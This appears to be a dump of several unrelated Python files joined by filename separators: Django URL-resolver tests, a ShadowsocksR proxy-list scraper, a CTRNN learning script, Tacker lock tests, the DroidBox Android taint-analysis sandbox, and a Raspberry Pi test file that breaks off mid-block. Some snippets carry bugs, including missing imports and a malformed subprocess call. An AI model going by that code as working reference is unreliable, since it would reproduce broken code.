@override_settings(ROOT_URLCONF="urlpatterns_reverse.namespace_urls")
class ResolverMatchTests(SimpleTestCase):
def test_urlpattern_resolve(self):
for (
path_,
url_name,
app_name,
namespace,
view_name,
func,
args,
kwargs,
) in resolve_test_data:
with self.subTest(path=path_):
# Legacy support for extracting "function, args, kwargs".
match_func, match_args, match_kwargs = resolve(path_)
self.assertEqual(match_func, func)
self.assertEqual(match_args, args)
self.assertEqual(match_kwargs, kwargs)
# ResolverMatch capabilities.
match = resolve(path_)
self.assertEqual(match.__class__, ResolverMatch)
self.assertEqual(match.url_name, url_name)
self.assertEqual(match.app_name, app_name)
self.assertEqual(match.namespace, namespace)
self.assertEqual(match.view_name, view_name)
self.assertEqual(match.func, func)
self.assertEqual(match.args, args)
self.assertEqual(match.kwargs, kwargs)
# and for legacy purposes:
self.assertEqual(match[0], func)
self.assertEqual(match[1], args)
self.assertEqual(match[2], kwargs)
def test_resolver_match_on_request(self):
response = self.client.get("/resolver_match/")
resolver_match = response.resolver_match
self.assertEqual(resolver_match.url_name, "test-resolver-match")
def test_resolver_match_on_request_before_resolution(self):
request = HttpRequest()
self.assertIsNone(request.resolver_match)
def test_repr(self):
self.assertEqual(
repr(resolve("/no_kwargs/42/37/")),
"ResolverMatch(func=urlpatterns_reverse.views.empty_view, "
"args=('42', '37'), kwargs={}, url_name='no-kwargs', app_names=[], "
"namespaces=[], route='^no_kwargs/([0-9]+)/([0-9]+)/$')",
)
def test_repr_extra_kwargs(self):
self.assertEqual(
repr(resolve("/mixed_args/1986/11/")),
"ResolverMatch(func=urlpatterns_reverse.views.empty_view, args=(), "
"kwargs={'arg2': '11', 'extra': True}, url_name='mixed-args', "
"app_names=[], namespaces=[], "
"route='^mixed_args/([0-9]+)/(?P<arg2>[0-9]+)/$', "
"captured_kwargs={'arg2': '11'}, extra_kwargs={'extra': True})",
)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.reverse_lazy_urls")
def test_classbased_repr(self):
self.assertEqual(
repr(resolve("/redirect/")),
"ResolverMatch(func=urlpatterns_reverse.views.LazyRedirectView, "
"args=(), kwargs={}, url_name=None, app_names=[], "
"namespaces=[], route='redirect/')",
)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls")
def test_repr_functools_partial(self):
tests = [
("partial", "template.html"),
("partial_nested", "nested_partial.html"),
("partial_wrapped", "template.html"),
]
for name, template_name in tests:
with self.subTest(name=name):
func = (
f"functools.partial({views.empty_view!r}, "
f"template_name='{template_name}')"
)
self.assertEqual(
repr(resolve(f"/{name}/")),
f"ResolverMatch(func={func}, args=(), kwargs={{}}, "
f"url_name='{name}', app_names=[], namespaces=[], "
f"route='{name}/')",
)
@override_settings(ROOT_URLCONF="urlpatterns.path_urls")
def test_pickling(self):
msg = "Cannot pickle ResolverMatch."
with self.assertRaisesMessage(pickle.PicklingError, msg):
pickle.dumps(resolve("/users/"))
@override_settings(ROOT_URLCONF="urlpatterns_reverse.erroneous_urls")
class ErroneousViewTests(SimpleTestCase):
def test_noncallable_view(self):
# View is not a callable (explicit import; arbitrary Python object)
with self.assertRaisesMessage(TypeError, "view must be a callable"):
path("uncallable-object/", views.uncallable)
def test_invalid_regex(self):
# Regex contains an error (refs #6170)
msg = '(regex_error/$" is not a valid regular expression'
with self.assertRaisesMessage(ImproperlyConfigured, msg):
reverse(views.empty_view)
class ViewLoadingTests(SimpleTestCase):
def test_view_loading(self):
self.assertEqual(
get_callable("urlpatterns_reverse.views.empty_view"), empty_view
)
self.assertEqual(get_callable(empty_view), empty_view)
def test_view_does_not_exist(self):
msg = "View does not exist in module urlpatterns_reverse.views."
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable("urlpatterns_reverse.views.i_should_not_exist")
def test_attributeerror_not_hidden(self):
msg = "I am here to confuse django.urls.get_callable"
with self.assertRaisesMessage(AttributeError, msg):
get_callable("urlpatterns_reverse.views_broken.i_am_broken")
def test_non_string_value(self):
msg = "'1' is not a callable or a dot-notation path"
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable(1)
def test_string_without_dot(self):
msg = "Could not import 'test'. The path must be fully qualified."
with self.assertRaisesMessage(ImportError, msg):
get_callable("test")
def test_module_does_not_exist(self):
with self.assertRaisesMessage(ImportError, "No module named 'foo'"):
get_callable("foo.bar")
def test_parent_module_does_not_exist(self):
msg = "Parent module urlpatterns_reverse.foo does not exist."
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable("urlpatterns_reverse.foo.bar")
def test_not_callable(self):
msg = (
"Could not import 'urlpatterns_reverse.tests.resolve_test_data'. "
"View is not callable."
)
with self.assertRaisesMessage(ViewDoesNotExist, msg):
get_callable("urlpatterns_reverse.tests.resolve_test_data")
class IncludeTests(SimpleTestCase):
url_patterns = [
path("inner/", views.empty_view, name="urlobject-view"),
re_path(
r"^inner/(?P<arg1>[0-9]+)/(?P<arg2>[0-9]+)/$",
views.empty_view,
name="urlobject-view",
),
re_path(r"^inner/\+\\\$\*/$", views.empty_view, name="urlobject-special-view"),
]
app_urls = URLObject("inc-app")
def test_include_urls(self):
self.assertEqual(include(self.url_patterns), (self.url_patterns, None, None))
def test_include_namespace(self):
msg = (
"Specifying a namespace in include() without providing an "
"app_name is not supported."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include(self.url_patterns, "namespace")
def test_include_4_tuple(self):
msg = "Passing a 4-tuple to include() is not supported."
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, "app_name", "namespace", "blah"))
def test_include_3_tuple(self):
msg = "Passing a 3-tuple to include() is not supported."
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, "app_name", "namespace"))
def test_include_3_tuple_namespace(self):
msg = (
"Cannot override the namespace for a dynamic module that provides a "
"namespace."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
include((self.url_patterns, "app_name", "namespace"), "namespace")
def test_include_2_tuple(self):
self.assertEqual(
include((self.url_patterns, "app_name")),
(self.url_patterns, "app_name", "app_name"),
)
def test_include_2_tuple_namespace(self):
self.assertEqual(
include((self.url_patterns, "app_name"), namespace="namespace"),
(self.url_patterns, "app_name", "namespace"),
)
def test_include_app_name(self):
self.assertEqual(include(self.app_urls), (self.app_urls, "inc-app", "inc-app"))
def test_include_app_name_namespace(self):
self.assertEqual(
include(self.app_urls, "namespace"), (self.app_urls, "inc-app", "namespace")
)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls")
class LookaheadTests(SimpleTestCase):
def test_valid_resolve(self):
test_urls = [
"/lookahead-/a-city/",
"/lookbehind-/a-city/",
"/lookahead+/a-city/",
"/lookbehind+/a-city/",
]
for test_url in test_urls:
with self.subTest(url=test_url):
self.assertEqual(resolve(test_url).kwargs, {"city": "a-city"})
def test_invalid_resolve(self):
test_urls = [
"/lookahead-/not-a-city/",
"/lookbehind-/not-a-city/",
"/lookahead+/other-city/",
"/lookbehind+/other-city/",
]
for test_url in test_urls:
with self.subTest(url=test_url):
with self.assertRaises(Resolver404):
resolve(test_url)
def test_valid_reverse(self):
test_urls = [
("lookahead-positive", {"city": "a-city"}, "/lookahead+/a-city/"),
("lookahead-negative", {"city": "a-city"}, "/lookahead-/a-city/"),
("lookbehind-positive", {"city": "a-city"}, "/lookbehind+/a-city/"),
("lookbehind-negative", {"city": "a-city"}, "/lookbehind-/a-city/"),
]
for name, kwargs, expected in test_urls:
with self.subTest(name=name, kwargs=kwargs):
self.assertEqual(reverse(name, kwargs=kwargs), expected)
def test_invalid_reverse(self):
test_urls = [
("lookahead-positive", {"city": "other-city"}),
("lookahead-negative", {"city": "not-a-city"}),
("lookbehind-positive", {"city": "other-city"}),
("lookbehind-negative", {"city": "not-a-city"}),
]
for name, kwargs in test_urls:
with self.subTest(name=name, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, kwargs=kwargs)
@override_settings(ROOT_URLCONF="urlpatterns_reverse.urls")
class ReverseResolvedTests(SimpleTestCase):
def test_rereverse(self):
match = resolve("/resolved/12/")
self.assertEqual(
reverse(match.url_name, args=match.args, kwargs=match.kwargs),
"/resolved/12/",
)
match = resolve("/resolved-overridden/12/url/")
self.assertEqual(
reverse(match.url_name, args=match.args, kwargs=match.captured_kwargs),
"/resolved-overridden/12/url/",
)
|
crawl-ssr.py
|
from urllib.request import *
from base64 import *
from threading import *
from queue import *
import re
ssrs = Queue()
threads = []
urls = [
'https://raw.githubusercontent.com/voken100g/AutoSSR/master/stable',
'https://raw.githubusercontent.com/voken100g/AutoSSR/master/online',
'https://raw.githubusercontent.com/voken100g/AutoSSR/master/recent'
]
def crawl(x: str, q: Queue):
print(f'Opening [{x}]!')
content = urlopen(x).read()
print(f'Contents from [{x}] received!')
content += b'=' * (-len(content) % 4)
for x in urlsafe_b64decode(content).decode().splitlines():
q.put(x)
for x in urls:
threads.append(Thread(target=crawl, args=(x, ssrs)))
threads[-1].setDaemon(True)
threads[-1].start()
urls = [
'https://github.com/goFindAlex/FreeSS/blob/master/list.txt',
'https://github.com/nulastudio/Freedom/blob/master/docs/index.html'
]
def crawl2(x: str, q: Queue, pattern):
print(f'Opening [{x}]!')
content = urlopen(x).read().decode()
print(f'Contents from [{x}] received!')
for x in pattern.findall(content):
x = x[1:-1]
q.put(x)
for x in urls:
threads.append(
Thread(target=crawl2, args=(x, ssrs, re.compile('\Wssr?:\/\/\w+\W'))))
threads[-1].setDaemon(True)
threads[-1].start()
for x in threads:
x.join(8)
if not ssrs.empty():
with open('ssrs.txt', 'w') as f:
while not ssrs.empty():
x = ssrs.get()
print(x, '\n\n')
f.write(x + '\n')
print("All done!")
for x in threads:
print(x)
|
2021-08-09.py
|
from multiprocessing.context import Process
from numpy import floor
import wandb
from behavior.oscillator import Oscillator
from job.learner import Learner
from rl_ctrnn.ctrnn import Ctrnn
from random import randint
THREAD_COUNT = 10
PROGENITOR = {
"time_constants": {0: 1.0, 1: 1.0},
"biases": {0: 5.154455202973727, 1: -10.756384207938911},
"weights": {
0: {0: 5.352730101212875, 1: 16.0},
1: {0: -11.915400080418113, 1: 2.7717190607157542},
},
}
def get_frozen(ctrnn: Ctrnn) -> float:
voltages = ctrnn.make_instance()
behavior = Oscillator(dt=0.01, size=ctrnn.size, duration=300, window=50)
behavior.setup(ctrnn.get_output(voltages))
while behavior.time < behavior.duration:
voltages = ctrnn.step(0.01, voltages)
behavior.grade(ctrnn.get_output(voltages))
return behavior.fitness
def get_log_data(m: Learner) -> dict:
data = {"Time": floor(m.behavior.time)}
data["distance"] = m.rlctrnn.distance
data["displacement"] = m.calculate_displacement()
# d_b = calculate_displacement(m.rlctrnn.center, WEIGHTS_OPTIMAL)
# data["remaining"] = d_b
data["performance"] = m.performance
data["reward"] = m.reward
data["flux"] = m.rlctrnn.flux
for y in range(m.rlctrnn.ctrnn.size):
for x in range(m.rlctrnn.ctrnn.size):
data[f"weight.{x}.{y}"] = m.rlctrnn.center[x, y]
return data
def main(seed):
progenitor = Ctrnn.from_dict(PROGENITOR)
PROGENITOR["fitness"] = get_frozen(progenitor)
run = wandb.init(project="temporary3", config={
"progenitor": PROGENITOR,
"seed": seed,
})
m = Learner(progenitor, seed)
m.behavior.dt = 0.01 # TODO: FIX EVERYWHERE
m.behavior.duration = 100
m.behavior.window = 10
time = -1
while m.is_running():
m.iter()
t = floor(m.behavior.time)
if t != time:
time = t
data = get_log_data(m)
run.log(data)
run.summary["fitness"] = get_frozen(m.rlctrnn.ctrnn)
run.finish()
if __name__ == "__main__":
for _ in range(1):
threads = []
for _ in range(THREAD_COUNT):
seed = randint(1, 100000)
threads.append(Process(target=main, args=(seed,)))
for _, p in enumerate(threads):
p.start()
for _, p in enumerate(threads):
p.join()
|
test_coordinate.py
|
# Copyright (C) 2021 Nippon Telegraph and Telephone Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import time
from oslo_utils import uuidutils
from tacker.sol_refactored.common import coordinate
from tacker.sol_refactored.common import exceptions as sol_ex
from tacker.tests import base
class TestCoordinate(base.BaseTestCase):
def setUp(self):
super(TestCoordinate, self).setUp()
self.sem_1 = threading.Semaphore(value=0)
self.sem_2 = threading.Semaphore(value=0)
self.ok = False
@coordinate.lock_vnf_instance('{inst_id}')
def _work_thread_1(self, inst_id, sleep_time):
# notify to parent
self.sem_1.release()
# wait to notify from parent
self.sem_2.acquire()
if sleep_time:
time.sleep(sleep_time)
@coordinate.lock_vnf_instance('{inst_id}')
def _work_thread_2(self, inst_id):
pass
@coordinate.lock_vnf_instance('{inst_id}', delay=True)
def _work_thread_3(self, inst_id):
self.ok = True
def test_lock_vnf_instance(self):
inst_id = uuidutils.generate_uuid()
th = threading.Thread(target=self._work_thread_1, args=(inst_id, 0))
th.start()
# wait to run _work_thread_1
self.sem_1.acquire()
self.assertRaises(sol_ex.OtherOperationInProgress,
self._work_thread_2, inst_id)
self.sem_2.release()
th.join()
def test_lock_vnf_instance_delay(self):
inst_id = uuidutils.generate_uuid()
th = threading.Thread(target=self._work_thread_1, args=(inst_id, 3))
th.start()
# wait to run _work_thread_1
self.sem_1.acquire()
self.sem_2.release()
self._work_thread_3(inst_id=inst_id)
th.join()
self.assertTrue(self.ok)
|
test_new_process.py
|
from multiprocessing import Process
import matplotlib.pyplot as plt
def plot_graph(*args):
plt.figure(figsize = (8,3))
plt.clf()
for data in args:
plt.plot(data)
plt.show()
p = Process(target=plot_graph, args=([1, 2, 3],))
p.start()
print 'yay'
print 'computation continues...'
print 'that rocks.'
print 'Now lets wait for the graph be closed to continue...:'
|
droidbox.py
|
import hashlib
import json
import os
import re
import signal
import subprocess
import sys
import threading
import time
import zipfile
from datetime import datetime
from subprocess import call, PIPE, Popen
from threading import Thread
from xml.dom import minidom
from utils import AXMLPrinter
# I have to modify DroidBox scripts to let it work with droidbot
__author__ = 'yuanchun'
################################################################################
# (c) 2011, The Honeynet Project
# Author: Patrik Lantz patrik@pjlantz.com and Laurent Delosieres ldelosieres@hispasec.com
#
# This program is free software you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
################################################################################
"""
Analyze dynamically Android applications
This script allows you to analyze dynamically Android applications.
It installs, runs, and analyzes Android applications.
At the end of each analysis, it outputs the Android application's characteristics in JSON.
Please keep in mind that all data received/sent,
read/written are shown in hexadecimal since the handled data can contain binary data.
"""
tags = {0x1: "TAINT_LOCATION", 0x2: "TAINT_CONTACTS", 0x4: "TAINT_MIC", 0x8: "TAINT_PHONE_NUMBER",
0x10: "TAINT_LOCATION_GPS", 0x20: "TAINT_LOCATION_NET", 0x40: "TAINT_LOCATION_LAST", 0x80: "TAINT_CAMERA",
0x100: "TAINT_ACCELEROMETER", 0x200: "TAINT_SMS", 0x400: "TAINT_IMEI", 0x800: "TAINT_IMSI",
0x1000: "TAINT_ICCID", 0x2000: "TAINT_DEVICE_SN", 0x4000: "TAINT_ACCOUNT", 0x8000: "TAINT_BROWSER",
0x10000: "TAINT_OTHERDB", 0x20000: "TAINT_FILECONTENT", 0x40000: "TAINT_PACKAGE", 0x80000: "TAINT_CALL_LOG",
0x100000: "TAINT_EMAIL", 0x200000: "TAINT_CALENDAR", 0x400000: "TAINT_SETTINGS"}
class LostADBException(Exception):
pass
class DroidBox(object):
def __init__(self, droidbot=None, output_dir=None):
self.sensitive_behaviors = []
self.enabled = True
self.droidbot = droidbot
self.logcat = None
self.application = None
self.apk_name = None
self.apk_hashes = None
self.applicationStarted = 0
self.is_counting_logs = False
self.timer = None
self.state_monitor = None
if self.droidbot:
self.state_monitor = self.droidbot.device.state_monitor
else:
from droidbot.state_monitor import StateMonitor
self.state_monitor = StateMonitor()
if output_dir:
self.output_dir = output_dir
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
else:
# Posibility that no output-files is generated
self.output_dir = None
def set_apk(self, apk_name):
if not self.enabled:
return
if apk_name is None:
return
# APK existing?
if not os.path.isfile(apk_name):
print("File %s not found" % apk_name)
sys.exit(1)
self.apk_name = os.path.abspath(apk_name)
self.application = Application(apk_name)
ret = self.application.processAPK()
# Error during the APK processing?
if ret == 0:
print("Failed to analyze the APK. Terminate the analysis.")
sys.exit(1)
main_activity = self.application.getMainActivity()
package_name = self.application.getPackage()
self.apk_hashes = self.application.getHashes()
# No Main activity found? Return an error
if main_activity is None:
print("No activity to start. Terminate the analysis.")
sys.exit(1)
# No packages identified? Return an error
if package_name is None:
print("No package found. Terminate the analysis.")
sys.exit(1)
# Execute the application
call(["adb", "logcat", "-c"])
ret = call(['monkeyrunner', 'monkeyrunner.py', apk_name,
package_name, main_activity], stderr=PIPE,
cwd=os.path.dirname(os.path.realpath(__file__)))
if ret == 1:
print("Failed to execute the application.")
sys.exit(1)
print("Starting the activity %s..." % main_activity)
# By default the application has not started
self.applicationStarted = 0
stringApplicationStarted = "Start proc %s" % package_name
# Open the adb logcat
if self.logcat is None:
self.logcat = Popen(["adb", "logcat", "-v", "threadtime", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
# Wait for the application to start
while 1:
try:
logcatInput = self.logcat.stdout.readline()
if not logcatInput:
raise Exception("We have lost the connection with ADB.")
# Application started?
if (stringApplicationStarted in logcatInput):
self.applicationStarted = 1
break
except:
break
if (self.applicationStarted == 0):
print("Analysis has not been done.")
# Kill ADB, otherwise it will never terminate
os.kill(self.logcat.pid, signal.SIGTERM)
sys.exit(1)
print("Application started")
def start_unblocked(self, duration=0):
droidbox_thread = threading.Thread(target=self.start_blocked, args=(duration,))
droidbox_thread.start()
def stop(self):
self.enabled = False
if self.timer and self.timer.isAlive():
self.timer.cancel()
if self.logcat is not None:
self.logcat.terminate()
self.logcat = None
if self.state_monitor:
self.state_monitor.stop()
def start_blocked(self, duration=0):
if not self.enabled:
return
# curses.setupterm()
# sys.stdout.write(curses.tigetstr("clear"))
sys.stdout.flush()
call(["adb", "wait-for-device"])
call(['adb', 'logcat', '-c'])
print " ____ __ ____"
print "/\ _`\ __ /\ \/\ _`\\"
print "\ \ \/\ \ _ __ ___ /\_\ \_\ \ \ \L\ \ ___ __ _"
print " \ \ \ \ \/\`'__\ __`\/\ \ /'_` \ \ _ <' / __`\/\ \/'\\"
print " \ \ \_\ \ \ \/\ \L\ \ \ \/\ \L\ \ \ \L\ \\ \L\ \/> </"
print " \ \____/\ \_\ \____/\ \_\ \___,_\ \____/ \____//\_/\_\\"
print " \/___/ \/_/\/___/ \/_/\/__,_ /\/___/ \/___/ \//\/_/"
counter = CountingThread()
counter.start()
if duration:
self.timer = threading.Timer(duration, self.stop)
self.timer.start()
if self.logcat is None:
self.logcat = Popen(["adb", "logcat", "-v", "threadtime", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Collect DroidBox logs
self.is_counting_logs = True
self.lastScreenshot = 0
first_log_time = None
fd2path = {}
while self.enabled:
try:
if self.output_dir and (time.time() - self.lastScreenshot) >= 5:
# Take screenshots every 5 seconds.
os.system("adb shell screencap -p | sed 's/\r$//' > %s" % os.path.join(self.output_dir, "screen") \
+ "_$(date +%Y-%m-%d_%H%M%S).png")
self.lastScreenshot = time.time()
logcatInput = self.logcat.stdout.readline()
if not logcatInput:
raise LostADBException("We have lost the connection with ADB.")
log_data = parse_log(logcatInput)
if log_data is None or not log_data['content'].startswith("DroidBox:"):
continue
log_time = log_data['datetime']
if first_log_time is None:
first_log_time = log_time
log_delta_seconds = (log_time - first_log_time).total_seconds()
log_content = json.loads(decode(log_data['content'][10:]))
log_process_names = self.state_monitor.get_names_by_pid(log_data['pid'])
log_process_name = "->".join(log_process_names)
for log_type in log_content:
log_detail = log_content[log_type]
if log_type == "FdAccess":
path = hexToStr(log_detail['path'])
fd2path[log_detail['id']] = path
log_detail['path'] = path
if log_type == "FileRW" and log_detail['id'] in fd2path:
log_detail['path'] = fd2path[log_detail['id']]
if log_type == "DataLeak":
log_detail['tag'] = getTags(int(log_detail['tag'], 16))
if log_detail['sink'] == "File" and log_detail['id'] in fd2path:
log_detail['path'] = fd2path[log_detail['id']]
log_dict = {"type": log_type,
"time": log_delta_seconds,
"process": log_process_name,
"detail": log_detail}
if self.filter_noises(log_dict):
continue
self.sensitive_behaviors.append(log_dict)
counter.increaseCount()
except KeyboardInterrupt:
break
except LostADBException:
break
except Exception as e:
print(e.message)
continue
self.is_counting_logs = False
counter.stopCounting()
counter.join()
# Kill ADB, otherwise it will never terminate
self.stop()
self.logcat = None
print json.dumps(self.get_output())
if self.output_dir is None:
return
with open(os.path.join(self.output_dir, "analysis.json"), "w") as json_file:
json_file.write(json.dumps(self.get_output(), sort_keys=True, indent=4))
def get_output(self):
# Done? Store the objects in a dictionary, transform it in a dict object and return it
output = dict()
# Sort the items by their key
output["recvsaction"] = self.application.getRecvsaction()
output["permissions"] = self.application.getPermissions()
output["hashes"] = self.apk_hashes
output["apkName"] = self.apk_name
output["sensitiveBehaviors"] = self.sensitive_behaviors
return output
def get_counts(self):
output = dict()
for behavior in self.sensitive_behaviors:
output[behavior['type']] = 0
for behavior in self.sensitive_behaviors:
output[behavior['type']] += 1
output["sum"] = sum(output.values())
return output
def filter_noises(self, log_dict):
"""
filter use less noises from log
:param log_dict: DroidBox log in dict format
:return: boolean
"""
if log_dict['type'] in ["FdAccess", "FileRW"]:
if log_dict['detail']['path'].startswith("socket") or log_dict['detail']['path'].startswith("pipe"):
return True
return False
class CountingThread(Thread):
"""
Used for user interface, showing in progress sign
and number of collected logs from the sandbox system
"""
def __init__(self):
"""
Constructor
"""
Thread.__init__(self)
self.stop = False
self.logs = 0
def stopCounting(self):
"""
Mark to stop this thread
"""
self.stop = True
def increaseCount(self):
self.logs += 1
def run(self):
"""
Update the progress sign and
number of collected logs
"""
signs = ['|', '/', '-', '\\']
counter = 0
while 1:
sign = signs[counter % len(signs)]
sys.stdout.write("[%s] Collected %s sandbox logs (Ctrl-C to view logs)\r" % (sign, str(self.logs)))
sys.stdout.flush()
time.sleep(0.5)
counter += 1
if self.stop:
print "[%s] Collected %s sandbox logs (Ctrl-C to view logs)" % ("*", str(self.logs))
break
class Application:
"""
Used for extracting information of an Android APK
"""
def __init__(self, filename):
self.filename = filename
self.packageNames = []
self.enfperm = []
self.permissions = []
self.recvs = []
self.activities = {}
self.recvsaction = {}
self.mainActivity = None
def processAPK(self):
xml = {}
error = True
try:
zip = zipfile.ZipFile(self.filename)
for i in zip.namelist():
if i == "AndroidManifest.xml":
try:
xml[i] = minidom.parseString(zip.read(i))
except:
xml[i] = minidom.parseString(AXMLPrinter(zip.read(i)).getBuff())
for item in xml[i].getElementsByTagName('manifest'):
self.packageNames.append(str(item.getAttribute("package")))
for item in xml[i].getElementsByTagName('permission'):
self.enfperm.append(str(item.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('uses-permission'):
self.permissions.append(str(item.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('receiver'):
self.recvs.append(str(item.getAttribute("android:name")))
for child in item.getElementsByTagName('action'):
self.recvsaction[str(item.getAttribute("android:name"))] = (
str(child.getAttribute("android:name")))
for item in xml[i].getElementsByTagName('activity'):
activity = str(item.getAttribute("android:name"))
self.activities[activity] = {}
self.activities[activity]["actions"] = list()
for child in item.getElementsByTagName('action'):
self.activities[activity]["actions"].append(str(child.getAttribute("android:name")))
for activity in self.activities:
for action in self.activities[activity]["actions"]:
if action == 'android.intent.action.MAIN':
self.mainActivity = activity
error = False
break
if not error:
return 1
else:
return 0
except:
return 0
def getEnfperm(self):
return self.enfperm
def getRecvsaction(self):
return self.recvsaction
def getMainActivity(self):
return self.mainActivity
def getActivities(self):
return self.activities
def getPermissions(self):
return self.permissions
def getRecvActions(self):
return self.recvsaction
def getPackage(self):
# One application has only one package name
return self.packageNames[0]
def getHashes(self, block_size=2 ** 8):
"""
Calculate MD5,SHA-1, SHA-256
hashes of APK input file
@param block_size:
"""
md5 = hashlib.md5()
sha1 = hashlib.sha1()
sha256 = hashlib.sha256()
f = open(self.filename, 'rb')
while True:
data = f.read(block_size)
if not data:
break
md5.update(data)
sha1.update(data)
sha256.update(data)
return [md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()]
def decode(s, encodings=('ascii', 'utf8', 'latin1')):
for encoding in encodings:
try:
return s.decode(encoding)
except UnicodeDecodeError:
pass
return s.decode('ascii', 'ignore')
def getTags(tagParam):
"""
Retrieve the tag names
"""
tagsFound = []
for tag in tags.keys():
if tagParam & tag != 0:
tagsFound.append(tags[tag])
return tagsFound
def hexToStr(hexStr):
"""
Convert a string hex byte values into a byte string
"""
bytes = []
hexStr = ''.join(hexStr.split(" "))
for i in range(0, len(hexStr), 2):
bytes.append(chr(int(hexStr[i:i + 2], 16)))
return unicode(''.join(bytes), errors='replace')
def interruptHandler(signum, frame):
"""
Raise interrupt for the blocking call 'logcatInput = sys.stdin.readline()'
"""
raise KeyboardInterrupt
# logcat regex, which will match the log message generated by `adb logcat -v threadtime`
LOGCAT_THREADTIME_RE = re.compile('^(?P<date>\S+)\s+(?P<time>\S+)\s+(?P<pid>[0-9]+)\s+(?P<tid>[0-9]+)\s+'
'(?P<level>[VDIWEFS])\s+(?P<tag>[^:]*):\s+(?P<content>.*)$')
def parse_log(log_msg):
"""
parse a logcat message
the log should be in threadtime format
@param log_msg:
@return:
"""
m = LOGCAT_THREADTIME_RE.match(log_msg)
if not m:
return None
log_dict = {}
date = m.group('date')
time = m.group('time')
log_dict['pid'] = m.group('pid')
log_dict['tid'] = m.group('tid')
log_dict['level'] = m.group('level')
log_dict['tag'] = m.group('tag')
log_dict['content'] = m.group('content')
datetime_str = "%s-%s %s" % (datetime.today().year, date, time)
log_dict['datetime'] = datetime.strptime(datetime_str, "%Y-%m-%d %H:%M:%S.%f")
return log_dict
def main():
argv = sys.argv
if len(argv) < 2 or len(argv) > 3:
print("Usage: droidbox.py filename.apk <duration in seconds>")
sys.exit(1)
duration = 0
# Duration given?
if len(argv) == 3:
duration = int(argv[2])
apkName = sys.argv[1]
# APK existing?
if os.path.isfile(apkName) == False:
print("File %s not found" % argv[1])
sys.exit(1)
droidbox = DroidBox()
droidbox.set_apk(apkName)
droidbox.start_blocked(duration)
# droidbox.get_output()
if __name__ == "__main__":
main()
|
test_job_handler.py
|
# test_job_handler.py
# How to start pytest?
# 1. def test_answer():
# 2. in test_sample.py
# 3. $ pytest
# 4. (only need assert exp, unlike unitest that you need to remember many assertTypes)
import logging
import time
from client.controller import JobHandler
from client.controller_raspi import ControllerRPi
from utils_2.config_parser import ConfigReader
def _get_controller():
conf = ConfigReader().get_params()
controller_raspi = ControllerRPi(conf=conf)
return controller_raspi
def _get_action():
action = 1
return action
def test_job_handler():
controller_raspi = _get_controller()
action = _get_action()
job_handler = JobHandler(controller_raspi, action)
logging.info(f'job handler doning action: {action}')
#job_handler = JobHandler(action)
job_handler.start()
time.sleep(5)
job_handler.join()
def test_movement_multiprocessing():
from multiprocessing import Process
import os
p = Process(target=movement, args=())
# class multiprocessing.Process(group=None, target=None, name=None, args=(), kwargs={}, *, daemon=None) # making sure that the default of args is =().
# p.run()/start()/join(timeout)/name/is_alive()/daemon/pid/terminate()/kill()/close()
# exception multiprocessing.ProcessError (base/all errors)/TimeoutError (specific error)
# run() Method representing the process's activity, should be override, default is object's __call__.
# start() Start the process's activity. Call at most once. Invoke object's run() in separate process.
# Can't use as task agent? Can't call start() then close() multipule times?
# Solution is to create process object for each call?
logging.info(f'multiprocess starting movement program.')
_log_pid()
p.start()
p.join()
def _log_pid():
logging.info(f'mudule name: {__name__}')
logging.info(f'parent process: {os.getppid()}')
logging.info(f'process id: {os.getpid()}')
def test_movement_subprocess():
import subprocess
logging.info(f'subprocess running controller_raspi.py main (do_action program).')
# subprocess.run(args, *, stdin=None, input=None, stdout=None, stderr=None, capture_output=False, shell=False, cwd=None, timeout=None, check=False, encoding=None, errors=None, text=None, env=None, universal_newlines=None, **other_popen_kwargs)
# subprocess.call(args, *, stdin=None, stdout=None, stderr=None, shell=False, cwd=None, timeout=None, **other_popen_kwargs)
subprocess.run(['python3 client.controller_raspi.py'])
# Older high-level API
# subprocess.call(...)
# Code needing to capture stdout or stderr should use run(...) instead.
#subprocess.call([f'python -m core.{package_name}.{service_name} -e 1'], shell=True)
logging.info(f'subprocess stoped controller_raspi.py main (do_action program).')
def movement():
_log_pid()
backward_pin = 11 # white_pin
forward_pin = 12 # purple_pin
right_pin = 13 # green_pin
left_pin = 15 # blue_pin
seconds = 2
freq = 100
duty_cycle = 100
print(f'Enter pin number to turn on (11/12/13/15/-1 to exit): ')
pin = int(input())
try:
while pin != -1:
GPIO.setup(pin, GPIO.OUT)
pwm = GPIO.PWM(pin, freq)
pwm.start(duty_cycle)
print(f'pin {pin} is now on freq {freq} and duty cycle {duty_cycle} and for the next {seconds} seconds')
time.sleep(seconds)
pwm.stop()
print(f'pin {pin} stopped.')
print(f'Enter pin number to turn on: ')
pin = int(input())
except:
